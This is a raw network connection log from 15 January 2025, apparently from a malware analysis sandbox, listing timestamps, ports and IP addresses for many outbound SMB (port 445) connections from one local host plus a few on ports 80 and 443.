Jan 15, 2025 16:58:15.844655991 CET	50067	445	192.168.2.8	40.249.82.1
Jan 15, 2025 16:58:15.849508047 CET	445	50067	40.249.82.1	192.168.2.8
Jan 15, 2025 16:58:16.589668036 CET	50068	445	192.168.2.8	41.232.2.97
Jan 15, 2025 16:58:16.594598055 CET	445	50068	41.232.2.97	192.168.2.8
Jan 15, 2025 16:58:16.594680071 CET	50068	445	192.168.2.8	41.232.2.97
Jan 15, 2025 16:58:16.594744921 CET	50068	445	192.168.2.8	41.232.2.97
Jan 15, 2025 16:58:16.594861031 CET	50069	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.599596977 CET	445	50068	41.232.2.97	192.168.2.8
Jan 15, 2025 16:58:16.599675894 CET	445	50069	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:16.599714041 CET	50069	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.599766970 CET	445	50068	41.232.2.97	192.168.2.8
Jan 15, 2025 16:58:16.599781990 CET	50069	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.599814892 CET	50068	445	192.168.2.8	41.232.2.97
Jan 15, 2025 16:58:16.600056887 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.604607105 CET	445	50069	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:16.604645967 CET	50069	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.604854107 CET	445	50070	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:16.604903936 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.604929924 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:16.609657049 CET	445	50070	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:16.864969969 CET	445	50018	38.185.147.1	192.168.2.8
Jan 15, 2025 16:58:16.865164042 CET	50018	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:16.865164042 CET	50018	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:16.865164042 CET	50018	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:16.870034933 CET	445	50018	38.185.147.1	192.168.2.8
Jan 15, 2025 16:58:16.870080948 CET	445	50018	38.185.147.1	192.168.2.8
Jan 15, 2025 16:58:17.023458958 CET	445	50019	209.135.205.1	192.168.2.8
Jan 15, 2025 16:58:17.023530960 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:58:17.023578882 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:58:17.023643017 CET	50019	445	192.168.2.8	209.135.205.1
Jan 15, 2025 16:58:17.028316021 CET	445	50019	209.135.205.1	192.168.2.8
Jan 15, 2025 16:58:17.028352022 CET	445	50019	209.135.205.1	192.168.2.8
Jan 15, 2025 16:58:17.028708935 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.033529997 CET	80	50071	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.033596992 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.033660889 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.038451910 CET	80	50071	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.038501024 CET	50071	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.043246031 CET	80	50071	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.090445042 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.090487003 CET	50072	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.097965002 CET	80	50073	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.097982883 CET	445	50072	209.135.205.2	192.168.2.8
Jan 15, 2025 16:58:17.098067999 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.098078012 CET	50072	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.098099947 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.099140882 CET	50072	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.099515915 CET	50074	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.103209019 CET	80	50073	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.103259087 CET	50073	80	192.168.2.8	88.198.69.43
Jan 15, 2025 16:58:17.103935003 CET	445	50072	209.135.205.2	192.168.2.8
Jan 15, 2025 16:58:17.103987932 CET	50072	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.104280949 CET	445	50074	209.135.205.2	192.168.2.8
Jan 15, 2025 16:58:17.104341984 CET	50074	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.104388952 CET	50074	445	192.168.2.8	209.135.205.2
Jan 15, 2025 16:58:17.108179092 CET	80	50073	88.198.69.43	192.168.2.8
Jan 15, 2025 16:58:17.109198093 CET	445	50074	209.135.205.2	192.168.2.8
Jan 15, 2025 16:58:17.605545044 CET	50075	445	192.168.2.8	118.158.103.244
Jan 15, 2025 16:58:17.610536098 CET	445	50075	118.158.103.244	192.168.2.8
Jan 15, 2025 16:58:17.610625982 CET	50075	445	192.168.2.8	118.158.103.244
Jan 15, 2025 16:58:17.610687971 CET	50075	445	192.168.2.8	118.158.103.244
Jan 15, 2025 16:58:17.610821962 CET	50076	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.615617990 CET	445	50075	118.158.103.244	192.168.2.8
Jan 15, 2025 16:58:17.615672112 CET	445	50075	118.158.103.244	192.168.2.8
Jan 15, 2025 16:58:17.615703106 CET	445	50076	118.158.103.1	192.168.2.8
Jan 15, 2025 16:58:17.615721941 CET	50075	445	192.168.2.8	118.158.103.244
Jan 15, 2025 16:58:17.615767002 CET	50076	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.615829945 CET	50076	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.616194010 CET	50077	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.620918989 CET	445	50076	118.158.103.1	192.168.2.8
Jan 15, 2025 16:58:17.620978117 CET	50076	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.621079922 CET	445	50077	118.158.103.1	192.168.2.8
Jan 15, 2025 16:58:17.621144056 CET	50077	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.623297930 CET	50077	445	192.168.2.8	118.158.103.1
Jan 15, 2025 16:58:17.628258944 CET	445	50077	118.158.103.1	192.168.2.8
Jan 15, 2025 16:58:17.855165958 CET	50078	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:17.860300064 CET	445	50078	9.166.247.1	192.168.2.8
Jan 15, 2025 16:58:17.860393047 CET	50078	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:17.860408068 CET	50078	445	192.168.2.8	9.166.247.1
Jan 15, 2025 16:58:17.865231991 CET	445	50078	9.166.247.1	192.168.2.8
Jan 15, 2025 16:58:18.395919085 CET	445	50070	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:18.396187067 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:18.396187067 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:18.399010897 CET	50070	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:18.401073933 CET	445	50070	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:18.403731108 CET	445	50070	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:18.595191956 CET	50079	445	192.168.2.8	47.60.61.144
Jan 15, 2025 16:58:18.600069046 CET	445	50079	47.60.61.144	192.168.2.8
Jan 15, 2025 16:58:18.600168943 CET	50079	445	192.168.2.8	47.60.61.144
Jan 15, 2025 16:58:18.600260973 CET	50079	445	192.168.2.8	47.60.61.144
Jan 15, 2025 16:58:18.600429058 CET	50080	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.605122089 CET	445	50079	47.60.61.144	192.168.2.8
Jan 15, 2025 16:58:18.605182886 CET	50079	445	192.168.2.8	47.60.61.144
Jan 15, 2025 16:58:18.605200052 CET	445	50080	47.60.61.1	192.168.2.8
Jan 15, 2025 16:58:18.605251074 CET	50080	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.605326891 CET	50080	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.605640888 CET	50081	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.610140085 CET	445	50080	47.60.61.1	192.168.2.8
Jan 15, 2025 16:58:18.610208035 CET	50080	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.610445976 CET	445	50081	47.60.61.1	192.168.2.8
Jan 15, 2025 16:58:18.610503912 CET	50081	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.610548019 CET	50081	445	192.168.2.8	47.60.61.1
Jan 15, 2025 16:58:18.615299940 CET	445	50081	47.60.61.1	192.168.2.8
Jan 15, 2025 16:58:18.898607016 CET	445	50022	158.94.246.1	192.168.2.8
Jan 15, 2025 16:58:18.898693085 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:18.899415970 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:18.899457932 CET	50022	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:18.904268026 CET	445	50022	158.94.246.1	192.168.2.8
Jan 15, 2025 16:58:18.904283047 CET	445	50022	158.94.246.1	192.168.2.8
Jan 15, 2025 16:58:19.068680048 CET	445	50023	198.232.135.1	192.168.2.8
Jan 15, 2025 16:58:19.068757057 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:58:19.068857908 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:58:19.068887949 CET	50023	445	192.168.2.8	198.232.135.1
Jan 15, 2025 16:58:19.073648930 CET	445	50023	198.232.135.1	192.168.2.8
Jan 15, 2025 16:58:19.073817015 CET	445	50023	198.232.135.1	192.168.2.8
Jan 15, 2025 16:58:19.122163057 CET	50082	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.127125025 CET	445	50082	198.232.135.2	192.168.2.8
Jan 15, 2025 16:58:19.127192020 CET	50082	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.127304077 CET	50082	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.128185034 CET	50083	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.132683039 CET	445	50082	198.232.135.2	192.168.2.8
Jan 15, 2025 16:58:19.132740974 CET	50082	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.133069038 CET	445	50083	198.232.135.2	192.168.2.8
Jan 15, 2025 16:58:19.133116961 CET	50083	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.133295059 CET	50083	445	192.168.2.8	198.232.135.2
Jan 15, 2025 16:58:19.138155937 CET	445	50083	198.232.135.2	192.168.2.8
Jan 15, 2025 16:58:19.483583927 CET	50084	445	192.168.2.8	122.230.196.134
Jan 15, 2025 16:58:19.488500118 CET	445	50084	122.230.196.134	192.168.2.8
Jan 15, 2025 16:58:19.488636971 CET	50084	445	192.168.2.8	122.230.196.134
Jan 15, 2025 16:58:19.495795012 CET	50084	445	192.168.2.8	122.230.196.134
Jan 15, 2025 16:58:19.496032953 CET	50085	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.500664949 CET	445	50084	122.230.196.134	192.168.2.8
Jan 15, 2025 16:58:19.500741959 CET	50084	445	192.168.2.8	122.230.196.134
Jan 15, 2025 16:58:19.500911951 CET	445	50085	122.230.196.1	192.168.2.8
Jan 15, 2025 16:58:19.500982046 CET	50085	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.508527040 CET	50085	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.509102106 CET	50086	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.513382912 CET	445	50085	122.230.196.1	192.168.2.8
Jan 15, 2025 16:58:19.513448000 CET	50085	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.513966084 CET	445	50086	122.230.196.1	192.168.2.8
Jan 15, 2025 16:58:19.514046907 CET	50086	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.514091015 CET	50086	445	192.168.2.8	122.230.196.1
Jan 15, 2025 16:58:19.518837929 CET	445	50086	122.230.196.1	192.168.2.8
Jan 15, 2025 16:58:19.870742083 CET	50087	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:19.875606060 CET	445	50087	38.185.147.1	192.168.2.8
Jan 15, 2025 16:58:19.875715017 CET	50087	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:19.875760078 CET	50087	445	192.168.2.8	38.185.147.1
Jan 15, 2025 16:58:19.880531073 CET	445	50087	38.185.147.1	192.168.2.8
Jan 15, 2025 16:58:20.308461905 CET	50088	445	192.168.2.8	130.148.27.119
Jan 15, 2025 16:58:20.313368082 CET	445	50088	130.148.27.119	192.168.2.8
Jan 15, 2025 16:58:20.313469887 CET	50088	445	192.168.2.8	130.148.27.119
Jan 15, 2025 16:58:20.313534975 CET	50088	445	192.168.2.8	130.148.27.119
Jan 15, 2025 16:58:20.313637018 CET	50089	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.318358898 CET	445	50089	130.148.27.1	192.168.2.8
Jan 15, 2025 16:58:20.318412066 CET	50089	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.318418026 CET	445	50088	130.148.27.119	192.168.2.8
Jan 15, 2025 16:58:20.318474054 CET	50088	445	192.168.2.8	130.148.27.119
Jan 15, 2025 16:58:20.318519115 CET	50089	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.318747044 CET	50090	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.323355913 CET	445	50089	130.148.27.1	192.168.2.8
Jan 15, 2025 16:58:20.323431969 CET	50089	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.323573112 CET	445	50090	130.148.27.1	192.168.2.8
Jan 15, 2025 16:58:20.323613882 CET	50090	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.323637962 CET	50090	445	192.168.2.8	130.148.27.1
Jan 15, 2025 16:58:20.328358889 CET	445	50090	130.148.27.1	192.168.2.8
Jan 15, 2025 16:58:20.896831036 CET	445	50026	176.122.86.1	192.168.2.8
Jan 15, 2025 16:58:20.896914005 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:20.896962881 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:20.897001028 CET	50026	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:20.901834011 CET	445	50026	176.122.86.1	192.168.2.8
Jan 15, 2025 16:58:20.901848078 CET	445	50026	176.122.86.1	192.168.2.8
Jan 15, 2025 16:58:21.074153900 CET	50091	445	192.168.2.8	209.207.4.46
Jan 15, 2025 16:58:21.079000950 CET	445	50091	209.207.4.46	192.168.2.8
Jan 15, 2025 16:58:21.079076052 CET	50091	445	192.168.2.8	209.207.4.46
Jan 15, 2025 16:58:21.079158068 CET	50091	445	192.168.2.8	209.207.4.46
Jan 15, 2025 16:58:21.079339027 CET	50092	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.084011078 CET	445	50091	209.207.4.46	192.168.2.8
Jan 15, 2025 16:58:21.084064960 CET	50091	445	192.168.2.8	209.207.4.46
Jan 15, 2025 16:58:21.084153891 CET	445	50092	209.207.4.1	192.168.2.8
Jan 15, 2025 16:58:21.084213972 CET	50092	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.084259033 CET	50092	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.084495068 CET	50093	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.089296103 CET	445	50092	209.207.4.1	192.168.2.8
Jan 15, 2025 16:58:21.089306116 CET	445	50093	209.207.4.1	192.168.2.8
Jan 15, 2025 16:58:21.089358091 CET	50092	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.089380026 CET	50093	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.092257023 CET	50093	445	192.168.2.8	209.207.4.1
Jan 15, 2025 16:58:21.097059965 CET	445	50093	209.207.4.1	192.168.2.8
Jan 15, 2025 16:58:21.152654886 CET	445	50027	112.84.177.1	192.168.2.8
Jan 15, 2025 16:58:21.152726889 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:58:21.152821064 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:58:21.152895927 CET	50027	445	192.168.2.8	112.84.177.1
Jan 15, 2025 16:58:21.157741070 CET	445	50027	112.84.177.1	192.168.2.8
Jan 15, 2025 16:58:21.157754898 CET	445	50027	112.84.177.1	192.168.2.8
Jan 15, 2025 16:58:21.214781046 CET	50094	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.219762087 CET	445	50094	112.84.177.2	192.168.2.8
Jan 15, 2025 16:58:21.219868898 CET	50094	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.219937086 CET	50094	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.220835924 CET	50095	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.224814892 CET	445	50094	112.84.177.2	192.168.2.8
Jan 15, 2025 16:58:21.224883080 CET	50094	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.225682020 CET	445	50095	112.84.177.2	192.168.2.8
Jan 15, 2025 16:58:21.225740910 CET	50095	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.225779057 CET	50095	445	192.168.2.8	112.84.177.2
Jan 15, 2025 16:58:21.230509996 CET	445	50095	112.84.177.2	192.168.2.8
Jan 15, 2025 16:58:21.408540010 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:21.414057016 CET	445	50096	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:21.414125919 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:21.417339087 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:21.423032045 CET	445	50096	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:21.902056932 CET	50098	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:21.907062054 CET	445	50098	158.94.246.1	192.168.2.8
Jan 15, 2025 16:58:21.907140970 CET	50098	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:21.907212019 CET	50098	445	192.168.2.8	158.94.246.1
Jan 15, 2025 16:58:21.912045956 CET	445	50098	158.94.246.1	192.168.2.8
Jan 15, 2025 16:58:22.932037115 CET	445	50030	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:22.932152987 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:22.932198048 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:22.932229996 CET	50030	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:22.936999083 CET	445	50030	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:22.937009096 CET	445	50030	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:23.136702061 CET	445	50031	201.202.46.1	192.168.2.8
Jan 15, 2025 16:58:23.136770964 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:23.136862993 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:23.136938095 CET	50031	445	192.168.2.8	201.202.46.1
Jan 15, 2025 16:58:23.141634941 CET	445	50031	201.202.46.1	192.168.2.8
Jan 15, 2025 16:58:23.141696930 CET	445	50031	201.202.46.1	192.168.2.8
Jan 15, 2025 16:58:23.199134111 CET	50102	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.204184055 CET	445	50102	201.202.46.2	192.168.2.8
Jan 15, 2025 16:58:23.205044031 CET	50102	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.205141068 CET	50102	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.205188990 CET	445	50096	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:23.205507040 CET	50103	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.205550909 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:23.205600023 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:23.205629110 CET	50096	445	192.168.2.8	41.232.2.1
Jan 15, 2025 16:58:23.209974051 CET	445	50102	201.202.46.2	192.168.2.8
Jan 15, 2025 16:58:23.210377932 CET	445	50103	201.202.46.2	192.168.2.8
Jan 15, 2025 16:58:23.210387945 CET	445	50096	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:23.210403919 CET	445	50096	41.232.2.1	192.168.2.8
Jan 15, 2025 16:58:23.210433006 CET	50102	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.210467100 CET	50103	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.210537910 CET	50103	445	192.168.2.8	201.202.46.2
Jan 15, 2025 16:58:23.215259075 CET	445	50103	201.202.46.2	192.168.2.8
Jan 15, 2025 16:58:23.261420965 CET	50104	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.266303062 CET	445	50104	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:23.268946886 CET	50104	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.269053936 CET	50104	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.269373894 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.274005890 CET	445	50104	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:23.274233103 CET	445	50105	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:23.274290085 CET	50104	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.274308920 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.274358988 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:23.279115915 CET	445	50105	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:23.902095079 CET	50108	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:23.907041073 CET	445	50108	176.122.86.1	192.168.2.8
Jan 15, 2025 16:58:23.907111883 CET	50108	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:23.907186031 CET	50108	445	192.168.2.8	176.122.86.1
Jan 15, 2025 16:58:23.911907911 CET	445	50108	176.122.86.1	192.168.2.8
Jan 15, 2025 16:58:24.943356991 CET	445	50034	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:24.943454027 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:24.943551064 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:24.943551064 CET	50034	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:24.948554993 CET	445	50034	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:24.948566914 CET	445	50034	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:25.146887064 CET	445	50035	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:25.146987915 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:25.148122072 CET	445	50105	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:25.148192883 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:25.149164915 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:25.149230957 CET	50035	445	192.168.2.8	69.111.126.1
Jan 15, 2025 16:58:25.149847984 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:25.149888039 CET	50105	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:25.154045105 CET	445	50035	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:25.154057026 CET	445	50035	69.111.126.1	192.168.2.8
Jan 15, 2025 16:58:25.154684067 CET	445	50105	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:25.154710054 CET	445	50105	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:25.215260983 CET	50116	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.220197916 CET	445	50116	69.111.126.2	192.168.2.8
Jan 15, 2025 16:58:25.220290899 CET	50116	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.221213102 CET	50116	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.221553087 CET	50117	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.226352930 CET	445	50117	69.111.126.2	192.168.2.8
Jan 15, 2025 16:58:25.226413965 CET	50117	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.226450920 CET	50117	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.227580070 CET	445	50116	69.111.126.2	192.168.2.8
Jan 15, 2025 16:58:25.233882904 CET	445	50117	69.111.126.2	192.168.2.8
Jan 15, 2025 16:58:25.259633064 CET	445	50116	69.111.126.2	192.168.2.8
Jan 15, 2025 16:58:25.259752989 CET	50116	445	192.168.2.8	69.111.126.2
Jan 15, 2025 16:58:25.933413029 CET	50126	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:25.938873053 CET	445	50126	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:25.938971996 CET	50126	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:25.939023018 CET	50126	445	192.168.2.8	32.252.86.1
Jan 15, 2025 16:58:25.945190907 CET	445	50126	32.252.86.1	192.168.2.8
Jan 15, 2025 16:58:26.176517010 CET	50128	443	192.168.2.8	92.113.16.129
Jan 15, 2025 16:58:26.176582098 CET	443	50128	92.113.16.129	192.168.2.8
Jan 15, 2025 16:58:26.176666975 CET	50128	443	192.168.2.8	92.113.16.129
Jan 15, 2025 16:58:26.803204060 CET	445	50038	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:26.803287029 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:26.803467989 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:26.803520918 CET	50038	445	192.168.2.8	57.162.85.1
Jan 15, 2025 16:58:26.808351994 CET	445	50038	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:26.808366060 CET	445	50038	57.162.85.1	192.168.2.8
Jan 15, 2025 16:58:27.215616941 CET	445	50039	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:27.215818882 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:27.215864897 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:27.215900898 CET	50039	445	192.168.2.8	200.214.167.1
Jan 15, 2025 16:58:27.220679998 CET	445	50039	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:27.220733881 CET	445	50039	200.214.167.1	192.168.2.8
Jan 15, 2025 16:58:27.277043104 CET	50151	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.282032013 CET	445	50151	200.214.167.2	192.168.2.8
Jan 15, 2025 16:58:27.282160044 CET	50151	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.282250881 CET	50151	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.282567024 CET	50152	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.287131071 CET	445	50151	200.214.167.2	192.168.2.8
Jan 15, 2025 16:58:27.287197113 CET	50151	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.287367105 CET	445	50152	200.214.167.2	192.168.2.8
Jan 15, 2025 16:58:27.287425995 CET	50152	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.287456989 CET	50152	445	192.168.2.8	200.214.167.2
Jan 15, 2025 16:58:27.292280912 CET	445	50152	200.214.167.2	192.168.2.8
Jan 15, 2025 16:58:27.948859930 CET	50163	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:27.953773975 CET	445	50163	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:27.953846931 CET	50163	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:27.953926086 CET	50163	445	192.168.2.8	88.63.225.1
Jan 15, 2025 16:58:27.958861113 CET	445	50163	88.63.225.1	192.168.2.8
Jan 15, 2025 16:58:28.151925087 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:28.158458948 CET	445	50173	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:28.158536911 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:28.158595085 CET	50173	445	192.168.2.8	41.232.2.2
Jan 15, 2025 16:58:28.164603949 CET	445	50173	41.232.2.2	192.168.2.8
Jan 15, 2025 16:58:28.600157022 CET	445	50042	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:28.600431919 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:28.600431919 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:28.600431919 CET	50042	445	192.168.2.8	153.101.17.1
Jan 15, 2025 16:58:28.605405092 CET	445	50042	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:28.605451107 CET	445	50042	153.101.17.1	192.168.2.8
Jan 15, 2025 16:58:28.925923109 CET	50193	443	192.168.2.8	104.18.243.107
Jan 15, 2025 16:58:28.925973892 CET	443	50193	104.18.243.107	192.168.2.8
Jan 15, 2025 16:58:28.926039934 CET	50193	443	192.168.2.8	104.18.243.107
